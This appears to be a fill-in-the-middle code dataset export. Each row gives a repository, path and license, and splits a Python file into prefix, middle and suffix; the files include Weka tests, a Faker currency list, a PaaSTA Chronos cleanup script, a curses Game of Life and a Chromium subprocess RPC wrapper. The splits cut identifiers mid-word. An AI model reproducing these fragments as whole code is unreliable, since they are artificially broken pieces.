repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
nvoron23/python-weka-wrapper
|
tests/wekatests/plottests/experiments.py
|
Python
|
gpl-3.0
| 2,900
| 0.002759
|
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# experiments.py
# Copyright (C) 2015 Fracpete (pythonwekawrapper at gmail dot com)
import unittest
import weka.core.jvm as jvm
import weka.core.converters as converters
import weka.classifiers as classifiers
import weka.experiments as experiments
import weka.plot.experiments as plot
import wekatests.tests.weka_test as weka_test
class TestExperiments(weka_test.WekaTest):
def test_plot_experiment(self):
"""
Tests the plot_experiment method.
"""
datasets = [self.datafile("bolts.arff"), self.datafile("bodyfat.arff"), self.datafile("autoPrice.arff")]
cls = [
classifiers.Classifier("weka.classifiers.trees.REPTree"),
classifiers.Classifier("weka.classifiers.functions.LinearRegression"),
classifiers.Classifier("weka.classifiers.functions.SMOreg"),
]
outfile = self.tempfile("results-rs.arff")
exp = experiments.SimpleRandomSplitExperiment(
classification=False,
runs=10,
percentage=66.6,
preserve_order=False,
datasets=datasets,
classifiers=cls,
result=outfile)
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
matrix = experiments.ResultMatrix("weka.experiment.ResultMatrixPlainText")
tester = experiments.Tester("weka.experiment.PairedCorrectedTTester")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Correlation_coefficient").index
tester.instances = data
tester.header(comparison_col)
tester.multi_resultset_full(0, comparison_col)
# plot
plot.plot_experiment(matrix, title="Random split (w/ StdDev)", measu
|
re="Correlation coefficient", show_stdev=True, wait=False)
|
plot.plot_experiment(matrix, title="Random split", measure="Correlation coefficient", wait=False)
def suite():
"""
Returns the test suite.
:return: the test suite
:rtype: unittest.TestSuite
"""
return unittest.TestLoader().loadTestsFromTestCase(TestExperiments)
if __name__ == '__main__':
jvm.start()
unittest.TextTestRunner().run(suite())
jvm.stop()
|
joke2k/faker
|
faker/providers/currency/es_ES/__init__.py
|
Python
|
mit
| 6,293
| 0.000161
|
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "Dírham de los Emiratos Árabes Unidos"),
("AFN", "Afghaní"),
("ALL", "Lek albanés"),
("AMD", "Dram armenio"),
("ANG", "Florín de las Antillas Holandesas"),
("AOA", "Kwanza angoleño"),
("ARS", "Peso argentino"),
("AUD", "Dólar australiano"),
("AWG", "Florín arubeño"),
("AZN", "Manat azerbaiyano"),
("BAM", "Marco bosnioherzegovino"),
("BBD", "Dólar barbadense"),
("BDT", "Taka bangladesí"),
("BGN", "Lev búlgaro"),
("BHD", "Dinar bahreiní"),
("BIF", "Franco burundés"),
("BMD", "Dólar de Bermudas"),
("BND", "Dólar bruneano"),
("BOB", "Boliviano"),
("BRL", "Real brasileño"),
("BSD", "Dólar bahameño"),
("BTN", "Ngultrum butanés"),
("BWP", "Pula de Botswana"),
("BYR", "Rublio bielurruso"),
("BZD", "Dólar beliceño"),
("CAD", "Dólar canadiense"),
("CDF", "Franco congolés"),
("CHF", "Franco suizo"),
("CLP", "Peso chileno"),
("CNY", "Yuan"),
("COP", "Peso colombiano"),
("CRC", "Colón costarricense"),
("CUC", "Peso cubano convertible"),
("CUP", "Peso subano"),
("CVE", "Escudo de Cabo Verde"),
("CZK", "Corona checa"),
("DJF", "Franco yibutiano"),
("DKK", "Corona danesa"),
("DOP", "Peso dominicano"),
("DZD", "Dinar argelino"),
("EGP", "Libra egipcia"),
("ERN", "Nafka"),
("ETB", "Bir de Etiopía"),
("EUR", "Euro"),
("FJD", "Dólar fiyiano"),
("FKP", "Libra de las islas Falkland"),
("GBP", "Libra esterlina"),
("GEL", "Larí georgiano"),
("GGP", "Libra de Guernsey"),
("GHS", "Cedi"),
("GIP", "Libra de Gibraltar"),
("GMD", "Dalasi"),
("GNF", "Franco guineano"),
("GTQ", "Quetzal guatemalteco"),
("GYD", "Dólar guyanés"),
("HKD", "Dólar hongkonés"),
("HNL", "Lempira hondureño"),
("HRK", "Kuna croata"),
("HTG", "Gourde haitiano"),
("HUF", "Forinto húngaro"),
|
("IDR", "Rupia indonesia"),
("ILS", "Séquel israelí"),
("NIS", "Nuevo Séquel israelí"),
("IMP", "Libra manesa"),
("INR", "Rupia india"),
("IQD", "Dinar iraquí"),
("IRR", "Rial iraní"),
("ISK", "Corona islandesa"),
("JEP", "Libra de Jersey"),
("JMD", "Dólar jamaicano"),
("JOD", "Dinar jordano"),
("JPY", "Yen japonés"),
("KES", "Chelín keniano"),
|
("KGS", "Som kirguís"),
("KHR", "Riel camboyano"),
("KMF", "Franco comorense"),
("KPW", "Won norcoreano"),
("KRW", "Krahn Occidental"),
("KWD", "Dinar kuwaití"),
("KYD", "Dólar de las islas Cayman"),
("KZT", "Tenge kazako"),
("LAK", "Kip laosiano"),
("LBP", "Libra libanesa"),
("LKR", "Rupia esrilanquesa"),
("LRD", "Dólar liberiano"),
("LSL", "Loti lesothense"),
("LTL", "Litas lituana"),
("LYD", "Dinar libio"),
("MAD", "Dirham marroquí"),
("MDL", "Leu moldavo"),
("MGA", "Ariary malgache"),
("MKD", "Denar normacedonio"),
("MMK", "Kyat birmano"),
("MNT", "Tugrik mongol"),
("MOP", "Pataca macaense"),
("MRO", "Ouguiya mauritano"),
("MUR", "Rupia mauritana"),
("MVR", "Rupia de Maldivas"),
("MWK", "Kwacha malauí"),
("MXN", "Peso mexicano"),
("MYR", "Ringgit"),
("MZN", "Metical mozambiqueño"),
("NAD", "Dólar namibio"),
("NGN", "Naira nigeriano"),
("NIO", "Córdoba nicaragüense"),
("NOK", "Corona noruega"),
("NPR", "Rupia nepalí"),
("NZD", "Dólar neozelandés"),
("OMR", "Rial omaní"),
("PAB", "Balboa panameño"),
("PEN", "Sol peruano"),
("PGK", "Kina"),
("PHP", "Peso filipino"),
("PKR", "Rupia pakistaní"),
("PLN", "Złoty polaco"),
("PYG", "Guaraní paraguayo"),
("QAR", "Riyal catarí"),
("RON", "Leu rumano"),
("RSD", "Dinar serbio"),
("RUB", "Rublo ruso"),
("RWF", "Franco ruandés"),
("SAR", "Riyal saudí"),
("SBD", "Dólar de las islas Solomon"),
("SCR", "Rupia seychellense"),
("SDG", "Libra sudanesa"),
("SEK", "Corona sueca"),
("SGD", "Dólar de Singapur"),
("SHP", "Libra de Santa Elena"),
("SLL", "Leona"),
("SOS", "Chelín somalí"),
("SPL", "Luigino"),
("SRD", "Dólar surinamés"),
("STD", "Dobra santotomense"),
("SVC", "Colón salvadoreño"),
("SYP", "Libra siria"),
("SZL", "Lilangeni"),
("THB", "Baht tailandés"),
("TJS", "Somoni tayiko"),
("TMT", "Manat turcomano"),
("TND", "Dinar tunecino"),
("TOP", "Pa'anga tongano"),
("TRY", "Lira turca"),
("TTD", "Dólar de Trinidad and Tobago"),
("TVD", "Dólar tuvaluano"),
("TWD", "Nuevo dólar taiwanés"),
("TZS", "Chelín tanzano"),
("UAH", "Grivna ucraniano"),
("UGX", "Chelín ugandés"),
("USD", "Dólar de Estados Unidos"),
("UYU", "Peso uruguayo"),
("UZS", "Soʻm Uzbekistani"),
("VEF", "Bolívar venezolano"),
("VND", "Đồng vietnamita"),
("VUV", "Vanuatu vatu"),
("WST", "Tālā samoano"),
("XAF", "Franco centro africano"),
("XCD", "Dólar del Caribe Oriental"),
("XDR", "Derechos especiales de giro"),
("XOF", "Franco de África occidental"),
("XPF", "Franco CFP"),
("YER", "Rial yemení"),
("ZAR", "Rand sudafricano"),
("ZMW", "Kwacha zambiano"),
("ZWD", "Dólar zimbabuense"),
)
price_formats = ["#,##", "%#,##", "%##,##", "%.###,##", "%#.###,##"]
def pricetag(self) -> str:
return self.numerify(self.random_element(self.price_formats)) + "\N{no-break space}\N{euro sign}"
|
matthewwardrop/formulaic
|
tests/parser/types/test_term.py
|
Python
|
mit
| 1,044
| 0
|
import pytest
from formulaic.parser.types import Factor, Term
class TestTerm:
@pytest.fixture
def term1(self):
return Term([Factor("c"), Factor("b")])
@pytest.fixture
def term2(self):
return Term([Factor("c"), Factor("d")])
@pytest.fixture
def term3(self):
return Term([Factor("a"), Factor("b"), Factor("c")])
def test_mul(self, term1, term2):
assert str(term1 * term2) == "b:c:d"
with pytest.raises(TypeError):
term1 * 1
def test_hash(self, term1):
assert hash(term1) == hash("b:c")
def test_equality(self, term1, term2):
assert term1 == term1
assert term1 == "b:c"
assert term1 != term2
assert term1 != 1
def test_sort(self, term1, term2, term3):
|
assert term1 < term2
assert term2 < term3
assert term1 < term3
assert not (term3 < term
|
1)
with pytest.raises(TypeError):
term1 < 1
def test_repr(self, term1):
assert repr(term1) == "b:c"
|
somic/paasta
|
paasta_tools/cleanup_chronos_jobs.py
|
Python
|
apache-2.0
| 8,610
| 0.002323
|
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./cleanup_chronos_jobs.py [options]
Clean up chronos jobs that aren't supposed to run on this cluster by deleting them.
Gets the current job list from chronos, and then a 'valid_job_list'
via chronos_tools.get_chronos_jobs_for_cluster
If a job is deployed by chronos but not in the expected list, it is deleted.
Any tasks associated with that job are also deleted.
- -d <SOA_DIR>, --soa-dir <SOA_DIR>: Specify a SOA config dir to read from
"""
import argparse
import datetime
import sys
import dateutil.parser
import pysensu_yelp
from paasta_tools import chronos_tools
from paasta_tools import monitoring_tools
from paasta_tools import utils
from paasta_tools.check_chronos_jobs import check_chronos_job_name
from paasta_tools.utils import InvalidJobNameError
from paasta_tools.utils import NoConfigurationForServiceError
from paasta_tools.utils import paasta_print
def parse_args():
parser = argparse.ArgumentParser(description='Cleans up stale chronos jobs.')
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=chronos_tools.DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
args = parser.parse_args()
return args
def execute_chronos_api_call_for_job(api_call, job):
"""Attempt a call to the Chronos api, catching any exception.
We *have* to catch Exception, because the client catches
the more specific exception thrown by the http clients
and rethrows an Exception -_-.
The chronos api returns a 204 No Content when the delete is
successful, and chronos-python only returns the body of the
response from all http calls. So, if this is successful,
then None will be returned.
https://github.com/asher/chronos-python/pull/7
We catch it here, so that the other deletes are completed.
"""
try:
return api_call(job)
except Exception as e:
return e
def cleanup_jobs(client, jobs):
"""Maps a list of jobs to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete, job)) for job in jobs]
def cleanup_tasks(client, jobs):
"""Maps a list of tasks to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete_tasks, job)) for job in jobs]
def format_list_output(title, job_names):
return '%s\n %s' % (title, '\n '.join(job_names))
def deployed_job_names(client):
return [job['name'] for job in client.list()]
def filter_paasta_jobs(jobs):
"""
Given a list of job name strings, return only those in the format PaaSTA expects.
:param jobs: a list of job names.
:returns: those job names in a format PaaSTA expects
"""
formatted = []
for job in jobs:
try:
# attempt to decompose it
service, instance = chronos_tools.decompose_job_id(job)
formatted.append(job)
except InvalidJobNameError:
pass
return formatted
def filter_tmp_jobs(job_names):
"""
filter temporary jobs created by chronos_rerun
"""
return [name for name in job_names if name.startswith(chronos_tools.TMP_JOB_IDENTIFIER)]
def filter_expired_tmp_jobs(client, job_names, cluster, soa_dir):
"""
Given a list of temporary jobs, find those ready to be removed. Their
suitablity for removal is defined by two things:
- the job has completed (irrespective of whether it was a success or
failure)
- the job completed more than 24 hours ago
"""
expired = []
for job_name in job_names:
service, instance = chronos_tools.decompose_job_id(job_name)
temporary_jobs = chronos_tools.get_temporary_jobs_for_service_instance(
client=client,
service=service,
instance=instance,
)
for job in temporary_jobs:
last_run_time, last_run_state = chronos_tools.get_status_last_run(job)
try:
chronos_job_config = chronos_tools.load_chronos_job_config(
service=service,
instance=instance,
cluster=cluster,
soa_dir=soa_dir,
)
interval
|
= chronos_job_config.get_schedule_interval_in_seconds() or 0
except NoConfigurationForServiceError:
# If we can't get the job's config, default to cleanup after 1 day
interval = 0
if last_run_state !=
|
chronos_tools.LastRunState.NotRun:
if ((datetime.datetime.now(dateutil.tz.tzutc()) -
dateutil.parser.parse(last_run_time)) >
max(datetime.timedelta(seconds=interval), datetime.timedelta(days=1))):
expired.append(job_name)
return expired
def main():
args = parse_args()
soa_dir = args.soa_dir
config = chronos_tools.load_chronos_config()
client = chronos_tools.get_chronos_client(config)
system_paasta_config = utils.load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
running_jobs = set(deployed_job_names(client))
expected_service_jobs = {chronos_tools.compose_job_id(*job) for job in
chronos_tools.get_chronos_jobs_for_cluster(soa_dir=args.soa_dir)}
all_tmp_jobs = set(filter_tmp_jobs(filter_paasta_jobs(running_jobs)))
expired_tmp_jobs = set(filter_expired_tmp_jobs(client, all_tmp_jobs, cluster=cluster, soa_dir=soa_dir))
valid_tmp_jobs = all_tmp_jobs - expired_tmp_jobs
to_delete = running_jobs - expected_service_jobs - valid_tmp_jobs
task_responses = cleanup_tasks(client, to_delete)
task_successes = []
task_failures = []
for response in task_responses:
if isinstance(response[-1], Exception):
task_failures.append(response)
else:
task_successes.append(response)
job_responses = cleanup_jobs(client, to_delete)
job_successes = []
job_failures = []
for response in job_responses:
if isinstance(response[-1], Exception):
job_failures.append(response)
else:
job_successes.append(response)
try:
(service, instance) = chronos_tools.decompose_job_id(response[0])
monitoring_tools.send_event(
check_name=check_chronos_job_name(service, instance),
service=service,
overrides={},
soa_dir=soa_dir,
status=pysensu_yelp.Status.OK,
output="This instance was removed and is no longer supposed to be scheduled.",
)
except InvalidJobNameError:
# If we deleted some bogus job with a bogus jobid that could not be parsed,
# Just move on, no need to send any kind of paasta event.
pass
if len(to_delete) == 0:
paasta_print('No Chronos Jobs to remove')
else:
if len(task_successes) > 0:
paasta_print(format_list_output(
"Successfully Removed Tasks (if any were running) for:",
[job[0] for job in task_successes],
))
# if there are any failures, print and exit appropriately
if len(task_failures) > 0:
paasta_print(format_list_output("Failed to Delete Tasks for:", [job[0] for job in task_failures]))
if len(job_successes) > 0:
|
getefesto/efesto
|
setup.py
|
Python
|
gpl-3.0
| 1,723
| 0
|
#!/usr/bin/env python
import io
import os
import sys
from efesto.Version import version
from setuptools import find_packages, setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
os.system('python setup.py bdist_wheel upload')
sys.exit()
readme = io.open('README.md', 'r', encoding='utf-8').read()
setup(
name='efesto',
description='RESTful (micro)server that can generate an API in minutes.',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/getefesto/efesto',
author='Jacopo Cascioli',
author_email='noreply@jacopocascioli.com',
license='GPL3',
version=version,
packages=find_packages(),
tests_require=[
'p
|
ytest',
'pytest-moc
|
k',
'pytest-falcon'
],
setup_requires=['pytest-runner'],
install_requires=[
'falcon>=1.4.1',
'falcon-cors>=1.1.7',
'psycopg2-binary>=2.7.5',
'peewee>=3.7.1',
'click==6.7',
'colorama>=0.4.0',
'aratrum>=0.3.2',
'python-rapidjson>=0.6.3',
'pyjwt>=1.6.4',
'ruamel.yaml>=0.15.74'
],
classifiers=[
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
],
entry_points="""
[console_scripts]
efesto=efesto.Cli:Cli.main
"""
)
|
michalliu/OpenWrt-Firefly-Libraries
|
staging_dir/host/lib/scons-2.3.1/SCons/Tool/sunf90.py
|
Python
|
gpl-2.0
| 2,198
| 0.003185
|
"""SCons.Tool.sunf90
Tool-specific initialization for sunf90, the Sun Studio F90 compiler.
The
|
re normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of
|
this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunf90.py 2014/03/02 14:18:15 garyo"
import SCons.Util
from FortranCommon import add_all_to_env
compilers = ['sunf90', 'f90']
def generate(env):
"""Add Builders and construction variables for sun f90 compiler to an
Environment."""
add_all_to_env(env)
fcomp = env.Detect(compilers) or 'f90'
env['FORTRAN'] = fcomp
env['F90'] = fcomp
env['SHFORTRAN'] = '$FORTRAN'
env['SHF90'] = '$F90'
env['SHFORTRANFLAGS'] = SCons.Util.CLVar('$FORTRANFLAGS -KPIC')
env['SHF90FLAGS'] = SCons.Util.CLVar('$F90FLAGS -KPIC')
def exists(env):
return env.Detect(compilers)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
JnyJny/GameOfLife
|
contrib/NCGameOfLife.py
|
Python
|
mit
| 5,897
| 0.010853
|
#!/usr/bin/env python3
'''Conway's Game of Life in a Curses Terminal Window
'''
import curses
import time
from GameOfLife import NumpyWorld
from GameOfLife import Patterns
from curses import ( COLOR_BLACK, COLOR_BLUE, COLOR_CYAN,
COLOR_GREEN, COLOR_MAGENTA, COLOR_RED,
COLOR_WHITE, COLOR_YELLOW )
class CursesWorld(NumpyWorld):
'''
Display a Game of Life in a terminal window using curses.
'''
colors = [COLOR_WHITE,COLOR_YELLOW,COLOR_MAGENTA,
COLOR_CYAN,COLOR_RED,COLOR_GREEN,COLOR_BLUE]
def __init__(self,window):
'''
:param: window - curses window
'''
h,w = window.getmaxyx()
super(CursesWorld,self).__init__(w,h-1)
self.w = window
self.interval = 0
for n,fg in enumerate(self.colors):
curses.init_pair(n+1,fg,COLOR_BLACK)
@property
def gps(self):
'''
Generations per second.
'''
try:
return self._gps
except AttributeError:
pass
self._gps = 0
return self._gps
@gps.setter
def gps(self,newValue):
self._gps = int(newValue)
def colorForCell(self,age):
'''
Returns a curses color_pair for a cell, chosen by the cell's age.
'''
n = min(age // 100,len(self.colors)-1)
return curses.color_pair(n+1)
def handle_input(self):
'''
Accepts input from the user and acts on it.
Key Action
-----------------
q exit()
Q exit()
+ increase redraw interval by 10 milliseconds
- decrease redraw interval by 10 milliseconds
'''
c = self.w.getch()
if c == ord('q') or c == ord('Q'):
exit()
if c == ord('+'):
self.interval += 10
if c == ord('-'):
self.interval -= 10
if self.interval < 0:
self.interval = 0
@property
def status(self):
'''
Format string for the status line.
'''
try:
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
except AttributeError:
pass
s = ['Q to quit\t',
'{self.generation:>10} G',
'{self.gps:>4} G/s',
'Census: {a:>5}/{t:<5}',
'{self.interval:>4} ms +/-']
self._status = ' '.join(s)
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
def draw(self):
'''
:return: None
Updates each character in the curses window with
the appropriate colored marker for each cell in the world.
Moves the cursor to bottom-most line, left-most column
when finished.
'''
for y in range(self.height):
for x in range(self.width):
c = self[x,y]
self.w.addch(y,x,self.markers[c > 0],self.colorForCell(c))
self.w.addstr(self.height,2,self.status)
self.w.move(self.height,1)
def run(self,stop=-1,interval=0):
'''
:param: stop - optional integer
:param: interval - optional integer
:return: None
This method will run the simulation described by world until the
given number of generations specified by ''stop'' has been met.
The default value will cause the simulation to run until interrupted
by the user.
The interval is number of milliseconds to pause between generations.
The default value of zero allows the simulation to run as fast as
possible.
The simulation is displayed via curses in a terminal window and
displays a status line at the bottom of the window.
The simulation can be stopped by the user pressing the keys 'q' or
'Q'. The interval between simulation steps can be increased with
the plus key '+' or decreased with the minus key '-' by increments
of 10 milliseconds.
'''
self.w.clear()
self.interval = interval
try:
while True:
if self.generation == stop:
|
break
self.handle_input()
t0 = time.time()
self.step()
self.draw()
self.w.refresh()
if self.interval:
cur
|
ses.napms(self.interval)
t1 = time.time()
self.gps = 1/(t1-t0)
except KeyboardInterrupt:
pass
def main(stdscr,argv):
w = CursesWorld(stdscr)
if len(argv) == 1:
raise ValueError("no patterns specified.")
for thing in argv[1:]:
name,_,where = thing.partition(',')
try:
x,y = map(int,where.split(','))
except:
x,y = 0,0
w.addPattern(Patterns[name],x=x,y=y)
stdscr.nodelay(True)
w.run()
def usage(argv,msg=None,exit_value=-1):
usagefmt = 'usage: {name} [[pattern_name],[X,Y]] ...'
namefmt = '\t{n}'
print(usagefmt.format(name=os.path.basename(argv[0])))
if msg:
print(msg)
print('pattern names:')
[print(namefmt.format(n=name)) for name in Patterns.keys()]
exit(exit_value)
if __name__ == '__main__':
import sys
import os
from curses import wrapper
try:
wrapper(main,sys.argv)
except KeyError as e:
usage(sys.argv,'unknown pattern {p}'.format(p=str(e)))
except ValueError as e:
usage(sys.argv,str(e))
|
Teamxrtc/webrtc-streaming-node
|
third_party/webrtc/src/chromium/src/testing/legion/process.py
|
Python
|
mit
| 8,760
| 0.010046
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""RPC compatible subprocess-type module.
This module defined both a task-side process class as well as a controller-side
process wrapper for easier access and usage of the task-side process.
"""
import logging
import os
import subprocess
import sys
import threading
import time
#pylint: disable=relative-import
import common_lib
# Map swarming_client to use subprocess42
sys.path.append(common_lib.SWARMING_DIR)
from utils import subprocess42
class TimeoutError(Exception):
pass
class ControllerProcessWrapper(object):
"""Controller-side process wrapper class.
This class provides a more intuitive interface to task-side processes
than calling the methods directly using the RPC object.
"""
def __init__(self, rpc, cmd, verbose=False, detached=False, cwd=None,
key=None, shell=None):
logging.debug('Creating a process with cmd=%s', cmd)
self._rpc = rpc
self._key = rpc.subprocess.Process(cmd, key)
logging.debug('Process created with key=%s', self._key)
if verbose:
self._rpc.subprocess.SetVerbose(self._key)
if detached:
self._rpc.subprocess.SetDetached(self._key)
if cwd:
self._rpc.subprocess.SetCwd(self._key, cwd)
if shell:
self._rpc.subprocess.SetShell(self._key)
self._rpc.subprocess.Start(self._key)
@property
def key(self):
return self._key
def Terminate(self):
logging.debug('Terminating process %s', self._key)
return self._rpc.subprocess.Terminate(self._key)
def Kill(self):
logging.debug('Killing process %s', self._key)
self._rpc.subprocess.Kill(self._key)
def Delete(self):
return self._rpc.subprocess.Delete(self._key)
def GetReturncode(self):
return self._rpc.subprocess.GetReturncode(self._key)
def ReadStdout(self):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
return self._rpc.subprocess.ReadStdout(self._key)
def ReadStderr(self):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadStderr(self._key)
def ReadOutput(self):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadOutput(self._key)
def Wait(self, timeout=None):
return self._rpc.subprocess.Wait(self._
|
key, timeout)
def Poll(self):
return self._rpc.subprocess.
|
Poll(self._key)
def GetPid(self):
return self._rpc.subprocess.GetPid(self._key)
class Process(object):
"""Implements a task-side non-blocking subprocess.
This non-blocking subprocess allows the caller to continue operating while
also able to interact with this subprocess based on a key returned to
the caller at the time of creation.
Creation args are set via Set* methods called after calling Process but
before calling Start. This is due to a limitation of the XML-RPC
implementation not supporting keyword arguments.
"""
_processes = {}
_process_next_id = 0
_creation_lock = threading.Lock()
def __init__(self, cmd, key):
self.stdout = ''
self.stderr = ''
self.key = key
self.cmd = cmd
self.proc = None
self.cwd = None
self.shell = False
self.verbose = False
self.detached = False
self.complete = False
self.data_lock = threading.Lock()
self.stdout_file = open(self._CreateOutputFilename('stdout'), 'wb+')
self.stderr_file = open(self._CreateOutputFilename('stderr'), 'wb+')
def _CreateOutputFilename(self, fname):
return os.path.join(common_lib.GetOutputDir(), '%s.%s' % (self.key, fname))
def __str__(self):
return '%r, cwd=%r, verbose=%r, detached=%r' % (
self.cmd, self.cwd, self.verbose, self.detached)
def _reader(self):
for pipe, data in self.proc.yield_any():
with self.data_lock:
if pipe == 'stdout':
self.stdout += data
self.stdout_file.write(data)
self.stdout_file.flush()
if self.verbose:
sys.stdout.write(data)
else:
self.stderr += data
self.stderr_file.write(data)
self.stderr_file.flush()
if self.verbose:
sys.stderr.write(data)
self.complete = True
@classmethod
def KillAll(cls):
for key in cls._processes:
cls.Kill(key)
@classmethod
def Process(cls, cmd, key=None):
with cls._creation_lock:
if not key:
key = 'Process%d' % cls._process_next_id
cls._process_next_id += 1
if key in cls._processes:
raise KeyError('Key %s already in use' % key)
logging.debug('Creating process %s with cmd %r', key, cmd)
cls._processes[key] = cls(cmd, key)
return key
def _Start(self):
logging.info('Starting process %s', self)
self.proc = subprocess42.Popen(self.cmd, stdout=subprocess42.PIPE,
stderr=subprocess42.PIPE,
detached=self.detached, cwd=self.cwd,
shell=self.shell)
threading.Thread(target=self._reader).start()
@classmethod
def Start(cls, key):
cls._processes[key]._Start()
@classmethod
def SetCwd(cls, key, cwd):
"""Sets the process's cwd."""
logging.debug('Setting %s cwd to %s', key, cwd)
cls._processes[key].cwd = cwd
@classmethod
def SetShell(cls, key):
"""Sets the process's shell arg to True."""
logging.debug('Setting %s.shell = True', key)
cls._processes[key].shell = True
@classmethod
def SetDetached(cls, key):
"""Creates a detached process."""
logging.debug('Setting %s.detached = True', key)
cls._processes[key].detached = True
@classmethod
def SetVerbose(cls, key):
"""Sets the stdout and stderr to be emitted locally."""
logging.debug('Setting %s.verbose = True', key)
cls._processes[key].verbose = True
@classmethod
def Terminate(cls, key):
logging.debug('Terminating process %s', key)
cls._processes[key].proc.terminate()
@classmethod
def Kill(cls, key):
logging.debug('Killing process %s', key)
cls._processes[key].proc.kill()
@classmethod
def Delete(cls, key):
if cls.GetReturncode(key) is None:
logging.warning('Killing %s before deleting it', key)
cls.Kill(key)
logging.debug('Deleting process %s', key)
cls._processes.pop(key)
@classmethod
def GetReturncode(cls, key):
return cls._processes[key].proc.returncode
@classmethod
def ReadStdout(cls, key):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stdout data
stdout = proc.stdout
proc.stdout = ''
return stdout
@classmethod
def ReadStderr(cls, key):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stderr data
stderr = proc.stderr
proc.stderr = ''
return stderr
@classmethod
def ReadOutput(cls, key):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return cls.ReadStdout(key), cls.ReadStderr(key)
@classmethod
def Wait(cls, key, timeout=None):
"""Wait for the process to complete.
We wait for all of the output to be written bef
|
edmorley/django
|
django/core/management/commands/makemessages.py
|
Python
|
bsd-3-clause
| 27,345
| 0.001682
|
import fnmatch
import glob
import os
import re
import sys
from functools import total_ordering
from itertools import dropwhile
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, handle_extensions, popen_wrapper,
)
from django.utils.encoding import DEFAULT_LOCALE_ENCODING
from django.utils.functional import cached_property
from django.utils.jslex import prepare_js_for_gettext
from django.utils.text import get_text_list
from django.utils.translation import templatize
plural_forms_re = re.compile(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', re.MULTILINE | re.DOTALL)
STATUS_OK = 0
NO_LOCALE_DIR = object()
def check_programs(*programs):
for program in programs:
